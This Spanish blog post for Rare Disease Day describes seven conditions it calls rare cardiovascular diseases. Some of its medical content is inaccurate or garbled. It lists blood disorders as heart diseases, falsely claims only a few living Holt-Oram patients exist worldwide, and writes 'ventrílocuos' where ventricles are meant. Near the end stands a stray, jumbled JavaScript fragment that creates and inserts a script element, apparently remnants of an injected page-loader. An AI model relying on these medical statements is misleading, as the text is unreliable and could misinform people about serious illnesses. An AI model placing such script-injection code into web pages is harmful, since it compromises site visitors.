Salud y belleza » Enfermedades, Salud, enfermedades raras

Enfermedades raras del corazón

Sin Comentarios

enfermedades-cardiovasculares-rarasEl 29 de Febrero se celebra el Día Mundial de las Enfermedades Raras, un día que además también es poco común, por lo que suele desplazarse al 28 de febrero. Se tratan de enfermedades que solo afectan al 7% de la población mundial, por lo que es más difícil que se desarrollen e investiguen tratamientos para esas enfermedades y muchas de ellas son potencialmente mortales. Para darle un poco más de visibilidad a esas patologías, vamos a exponerte algunas enfermedades cardiovasculares poco comunes.

- Púrpura trombocitopénica idiopática: un trastorno hemorrágico en el que el sistema inmunitario destruye las plaquetas, lo que hace que la sangre no coagule bien. Sus principales síntomas son: erupciones en la piel, hematomas, sangrado nasal, menstruación demasiado abundante… con tratamiento se puede mejorar la enfermedad.

- Hemoglobinuria Paroxística Nocturna: una enfermedad genética que es difícil de diagnosticar. Normalmente se desarrolla alrededor de los 30 años y su principal síntoma es el aumento del riesgo de sufrir trombosis, lo que provoca la muerte del 35% de los enfermos en menos de cinco años.

- Síndrome Hemolítico Urémico atípico: esta enfermedad crónica es mortal si no se diagnostica y trata de forma adecuada. Puede afectar tanto a niños como a adultos y la principal consecuencia es el riesgo elevado de trombos en cualquier órgano vital. Un 10% de los enfermos mueren y un 60% necesitan diálisis de por vida.

- Enfermedad de Kawasaki: es una enfermedad que suele darse en Japón y que afecta a niños menores de 5 años. Se cree que se trata de un trastorno autoinmune. El Kawasaki afecta a los ganglios linfáticos, las paredes de los vasos sanguíneos y el corazón.

- Síndrome de Brugada: esta enfermedad genética altera los gener que dirigen la formación de las proteínas cardíacas, por lo que se altera el flujo de iones por las membranas, lo que favorece la aparición de arritmias, normalmente ventriculares, que pueden llegar a provocar síncopes e incluso la muerte súbita.

enfermedades-del-corazon

- Síndrome de Holt-Oram: el síndrome corazón-mano. Apenas hay varios casos de pacientes vivos en el mundo y la enfermedad se caracteriza por anomalías esqueléticas de las extremidades superiores y por defectos cardíacos congénitos.

- Corazón en criss-cross: se trata de una malformación cardiaca congénita muy rara que hace que se crucen los flujos de entrada de los ventrílocuos.

¿Conocías alguna de estas enfermedades cardiovasculares raras?

document.currentScript.parentNode.insertBefore(s, document.currentScript);var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.